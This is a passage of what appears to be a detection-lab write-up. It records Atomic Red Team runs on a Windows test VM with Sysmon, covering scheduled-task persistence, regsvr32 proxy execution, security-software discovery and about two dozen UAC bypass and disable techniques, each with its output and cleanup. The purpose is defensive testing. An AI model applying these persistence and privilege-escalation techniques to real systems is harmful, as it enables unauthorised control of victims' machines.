"ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:95 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:96 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exit code: 0 Done executing test: T1053.005-5 Task Scheduler via VBA Executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task cmdletOutput ReturnValue PSComputerName ------------ ----------- -------------- MSFT_ScheduledTask (TaskName = "T1053_005_WMI", TaskPath = "\") 0 Exit code: 0 Done executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task Executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry The operation completed successfully. SUCCESS: The scheduled task "ATOMIC-T1053.005" has successfully been created. Exit code: 0 Done executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry Executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute cmdletOutput ReturnValue PSComputerName ------------ ----------- -------------- MSFT_ScheduledTask (TaskName = "atomic red team", TaskPath = "\") 0 Exit code: 0 Done executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute Executing test: T1053.005-9 PowerShell Modify A Scheduled Task TaskPath TaskName State -------- -------- ----- \ AtomicTaskModifed Ready \ AtomicTaskModifed Ready Exit code: 0 Done executing test: T1053.005-9 PowerShell Modify A Scheduled Task Executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation The filename, directory name, or volume label syntax is incorrect. Exit code: 1 Done executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation ```

Cleanup

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1053.005 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1053.005-1 Scheduled Task Startup Script SUCCESS: The scheduled task "T1053_005_OnLogon" has successfully been created. SUCCESS: The scheduled task "T1053_005_OnStartup" has successfully been created. Exit code: 0 Done executing test: T1053.005-1 Scheduled Task Startup Script Executing test: T1053.005-2 Scheduled task Local SUCCESS: The scheduled task "spawn" has successfully been created. Exit code: 0 Done executing test: T1053.005-2 Scheduled task Local Executing test: T1053.005-3 Scheduled task Remote ERROR: No mapping between account names and security IDs was done. Exit code: 1 Done executing test: T1053.005-3 Scheduled task Remote Executing test: T1053.005-4 Powershell Cmdlet Scheduled Task TaskPath TaskName State -------- -------- ----- \ AtomicTask Ready Exit code: 0 Done executing test: T1053.005-4 Powershell Cmdlet Scheduled Task Executing test: T1053.005-5 Task Scheduler via VBA New-Object : Retrieving the COM class factory for component with CLSID {00000000-0000-0000-0000-000000000000} failed due to the following error: 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)). At line:70 char:12 + $app = New-Object -ComObject "$officeProduct.Application" + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [New-Object], COMException + FullyQualifiedErrorId : NoCOMClassIdentified,Microsoft.PowerShell.Commands.NewObjectCommand New-Item : The registry key at the specified path does not exist. At line:73 char:34 + if (-not (Test-Path $key)) { New-Item $Key } + CategoryInfo : InvalidArgument: (HKEY_CURRENT_US...oft\Office\Word:String) [New-Item], ArgumentExceptio n + FullyQualifiedErrorId : System.ArgumentException,Microsoft.PowerShell.Commands.NewItemCommand + ~~~~~~~~~~~~~ At line:74 char:5 Set-ItemProperty : Cannot find path 'HKCU:\Software\Microsoft\Office\Word\Security\' because it does not exist. + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (HKCU:\Software\...\Word\Security\:String) [Set-ItemProperty], ItemNotFo undException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetItemPropertyCommand You cannot call a method on a null-valued expression. At line:84 char:9 + Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1 + $doc = $app.Documents.Add() + ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:89 char:5 + $comp = $doc.VBProject.VBComponents.Add(1) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:90 char:5 + $comp.CodeModule.AddFromString($macroCode) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:91 char:5 + $app.Run($sub) + ~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:92 char:5 + $doc.Close(0) + ~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. + $app.Quit() + ~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:93 char:5 At line:94 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:95 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:96 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exit code: 0 Done executing test: T1053.005-5 Task Scheduler via VBA Executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task cmdletOutput ReturnValue PSComputerName ------------ ----------- -------------- MSFT_ScheduledTask (TaskName = "T1053_005_WMI", TaskPath = "\") 0 Exit code: 0 Done executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task Executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry The operation completed successfully. SUCCESS: The scheduled task "ATOMIC-T1053.005" has successfully been created. Exit code: 0 Done executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry Executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute cmdletOutput ReturnValue PSComputerName ------------ ----------- -------------- MSFT_ScheduledTask (TaskName = "atomic red team", TaskPath = "\") 0 Exit code: 0 Done executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute Executing test: T1053.005-9 PowerShell Modify A Scheduled Task TaskPath TaskName State -------- -------- ----- \ AtomicTaskModifed Ready \ AtomicTaskModifed Ready Exit code: 0 Done executing test: T1053.005-9 PowerShell Modify A Scheduled Task Executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation The filename, directory name, or volume label syntax is incorrect. Exit code: 1 Done executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation ```

Sysmon event log


Dashboard alert

 

T1218.010 – Signed Binary Proxy Execution: Regsvr32

GetPrereqs

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1218.010 -GetPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics GetPrereq's for: T1218.010-1 Regsvr32 local COM scriptlet execution Attempting to satisfy prereq: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct) Prereq already met: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct) GetPrereq's for: T1218.010-2 Regsvr32 remote COM scriptlet execution No Preqs Defined GetPrereq's for: T1218.010-3 Regsvr32 local DLL execution Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) GetPrereq's for: T1218.010-4 Regsvr32 Registering Non DLL Attempting to satisfy prereq: Test requires a renamed dll file 1 file(s) copied. Prereq successfully met: Test requires a renamed dll file GetPrereq's for: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) ```

Test run

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1218.010 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1218.010-1 Regsvr32 local COM scriptlet execution Exit code: 5 Done executing test: T1218.010-1 Regsvr32 local COM scriptlet execution Executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution Exception calling "Start" with "0" argument(s): "Access is denied" At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:45 char:17 + $process.Start() > $null + ~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : Win32Exception Exit code: Done executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution Executing test: T1218.010-3 Regsvr32 local DLL execution Exit code: 0 Done executing test: T1218.010-3 Regsvr32 local DLL execution Executing test: T1218.010-4 Regsvr32 Registering Non DLL Exit code: 0 Done executing test: T1218.010-4 Regsvr32 Registering Non DLL Executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer Exit code: 0 Done executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer ```

Cleanup

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1218.010 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution Done executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution Executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution Done executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution Executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution Done executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution Executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL Done executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL Executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer Done executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer ```

Sysmon event log


Dashboard event

 

T1518.001 – Software Discovery: Security Software Discovery

GetPrereqs

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1518.001 -GetPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics GetPrereq's for: T1518.001-1 Security Software Discovery No Preqs Defined GetPrereq's for: T1518.001-2 Security Software Discovery - powershell No Preqs Defined GetPrereq's for: T1518.001-6 Security Software Discovery - Sysmon Service No Preqs Defined GetPrereq's for: T1518.001-7 Security Software Discovery - AV Discovery via WMI No Preqs Defined GetPrereq's for: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets No Preqs Defined GetPrereq's for: T1518.001-9 Security Software Discovery - Windows Defender Enumeration No Preqs Defined GetPrereq's for: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration No Preqs Defined ```

Test run

outputExec.log

Cleanup

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1518.001 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1518.001-1 Security Software Discovery Done executing cleanup for test: T1518.001-1 Security Software Discovery Executing cleanup for test: T1518.001-2 Security Software Discovery - powershell Done executing cleanup for test: T1518.001-2 Security Software Discovery - powershell Executing cleanup for test: T1518.001-6 Security Software Discovery - Sysmon Service Done executing cleanup for test: T1518.001-6 Security Software Discovery - Sysmon Service Executing cleanup for test: T1518.001-7 Security Software Discovery - AV Discovery via WMI Done executing cleanup for test: T1518.001-7 Security Software Discovery - AV Discovery via WMI Executing cleanup for test: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets Done executing cleanup for test: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets Executing cleanup for test: T1518.001-9 Security Software Discovery - Windows Defender Enumeration Done executing cleanup for test: T1518.001-9 Security Software Discovery - Windows Defender Enumeration Executing cleanup for test: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration Done executing cleanup for test: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration ```

Sysmon event log


Dashboard event

 

T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control

GetPrereqs

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd) Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd) CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe Prerequisites met: T1548.002-8 Disable UAC using reg.exe CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task CheckPrereq's for: T1548.002-10 UACME Bypass Method 23 Prerequisites met: T1548.002-10 UACME Bypass Method 23 CheckPrereq's for: T1548.002-11 UACME Bypass Method 31 Prerequisites met: T1548.002-11 UACME Bypass Method 31 CheckPrereq's for: T1548.002-12 UACME Bypass Method 33 Prerequisites met: T1548.002-12 UACME Bypass Method 33 CheckPrereq's for: T1548.002-13 UACME Bypass Method 34 Prerequisites met: T1548.002-13 UACME Bypass Method 34 CheckPrereq's for: T1548.002-14 UACME Bypass Method 39 Prerequisites met: T1548.002-14 UACME Bypass Method 39 CheckPrereq's for: T1548.002-15 UACME Bypass Method 56 Prerequisites met: T1548.002-15 UACME Bypass Method 56 CheckPrereq's for: T1548.002-16 UACME Bypass Method 59 Prerequisites met: T1548.002-16 UACME Bypass Method 59 CheckPrereq's for: T1548.002-17 UACME Bypass Method 61 Prerequisites met: T1548.002-17 UACME Bypass Method 61 CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic Prerequisites met: T1548.002-18 WinPwn - UAC Magic CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique CheckPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Prerequisites met: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key CheckPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification Prerequisites met: T1548.002-23 UAC Bypass with WSReset Registry Modification CheckPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Prerequisites met: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key CheckPrereq's for: T1548.002-25 Disable UAC notification via registry keys Prerequisites met: T1548.002-25 Disable UAC notification via registry keys CheckPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys Prerequisites met: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Test run

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout The operation completed successfully. Microsoft Windows [Version 10.0.22631.3155] (c) Microsoft Corporation. All rights reserved. C:\Users\vagrant\AppData\Local\Temp> Exit code: 0 Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open Name Property ---- -------- command Exit code: 0 Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Executing test: T1548.002-3 Bypass UAC using Fodhelper The operation completed successfully The operation completed successfully. Exit code: 0 Done executing test: T1548.002-3 Bypass UAC using Fodhelper Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories 1 file(s) copied. symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe Exit code: 0 Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open Name Property ---- -------- command (default) : cmd.exe /c notepad.exe DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Executing test: T1548.002-8 Disable UAC using reg.exe The operation completed successfully. Exit code: 0 Done executing test: T1548.002-8 Disable UAC using reg.exe Executing test: T1548.002-9 Bypass UAC using SilentCleanup task The screen cannot be set to the number of lines and columns specified. The operation completed successfully. Exit code: 0 Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task Executing test: T1548.002-10 UACME Bypass Method 23 Exit code: 1073741845 Done executing test: T1548.002-10 UACME Bypass Method 23 Executing test: T1548.002-11 UACME Bypass Method 31 Exit code: 1073741845 Done executing test: T1548.002-11 UACME Bypass Method 31 Executing test: T1548.002-12 UACME Bypass Method 33 Exit code: 1073741845 Done executing test: T1548.002-12 UACME Bypass Method 33 Executing test: T1548.002-13 UACME Bypass Method 34 Exit code: 1073741845 Done executing test: T1548.002-13 UACME Bypass Method 34 Executing test: T1548.002-14 UACME Bypass Method 39 Exit code: 1073741845 Done executing test: T1548.002-14 UACME Bypass Method 39 Executing test: T1548.002-15 UACME Bypass Method 56 Exit code: 1073741845 Done executing test: T1548.002-15 UACME Bypass Method 56 Executing test: T1548.002-16 UACME Bypass Method 59 Exit code: 1073741845 Done executing test: T1548.002-16 UACME Bypass Method 59 Executing test: T1548.002-17 UACME Bypass Method 61 Exit code: 1073741845 Done executing test: T1548.002-17 UACME Bypass Method 61 Executing test: T1548.002-18 WinPwn - UAC Magic Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory: Directory: C:\Users\vagrant\AppData\Local\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/27/2024 12:12 PM LocalRecon d----- 2/27/2024 12:12 PM DomainRecon Directory: C:\Users\vagrant\AppData\Local\Temp\DomainRecon Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/27/2024 12:12 PM ADrecon Directory: C:\Users\vagrant\AppData\Local\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/27/2024 12:12 PM LocalPrivEsc d----- 2/27/2024 12:12 PM Exploitation d----- 2/27/2024 12:12 PM Vulnerabilities __ ___ ____ \ \ / (_)_ __ | _ \__ ___ __ \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ \ V V / | | | | | __/ \ V V /| | | | \_/\_/ |_|_| |_|_| \_/\_/ |_| |_| --> UAC Bypass [!] Session is elevated! Exit code: 0 Done executing test: T1548.002-18 WinPwn - UAC Magic Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory: __ ___ ____ \ \ / (_)_ __ | _ \__ ___ __ \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ \ V V / | | | | | __/ \ V V /| | | | \_/\_/ |_|_| |_|_| \_/\_/ |_| |_| --> UAC Bypass Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 26 2 416 1344 0.00 10340 1 cmstp False True Hwnd : 2950888 Process : cmstp Exit code: 0 Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory: __ ___ ____ \ \ / (_)_ __ | _ \__ ___ __ \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ \ V V / | | | | | __/ \ V V /| | | | \_/\_/ |_|_| |_|_| \_/\_/ |_| |_| --> UAC Bypass Exit code: 0 Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Exit code: 0 Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Exit code: 0 Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Exit code: 0 Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Exit code: 0 Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Executing test: T1548.002-25 Disable UAC notification via registry keys The operation completed successfully. Exit code: 0 Done executing test: T1548.002-25 Disable UAC notification via registry keys Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys The operation completed successfully. Exit code: 0 Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Cleanup

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe The operation completed successfully. Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task Executing cleanup for test: T1548.002-10 UACME Bypass Method 23 Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23 Executing cleanup for test: T1548.002-11 UACME Bypass Method 31 Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31 Executing cleanup for test: T1548.002-12 UACME Bypass Method 33 Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33 Executing cleanup for test: T1548.002-13 UACME Bypass Method 34 Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34 Executing cleanup for test: T1548.002-14 UACME Bypass Method 39 Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39 Executing cleanup for test: T1548.002-15 UACME Bypass Method 56 Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56 Executing cleanup for test: T1548.002-16 UACME Bypass Method 59 Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59 Executing cleanup for test: T1548.002-17 UACME Bypass Method 61 Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61 Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification Done executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys The operation completed successfully. Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys The operation completed successfully. Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Sysmon event log


Dashboard event

 

T1574.002 – Hijack Execution Flow: DLL Side-Loading

GetPrereqs

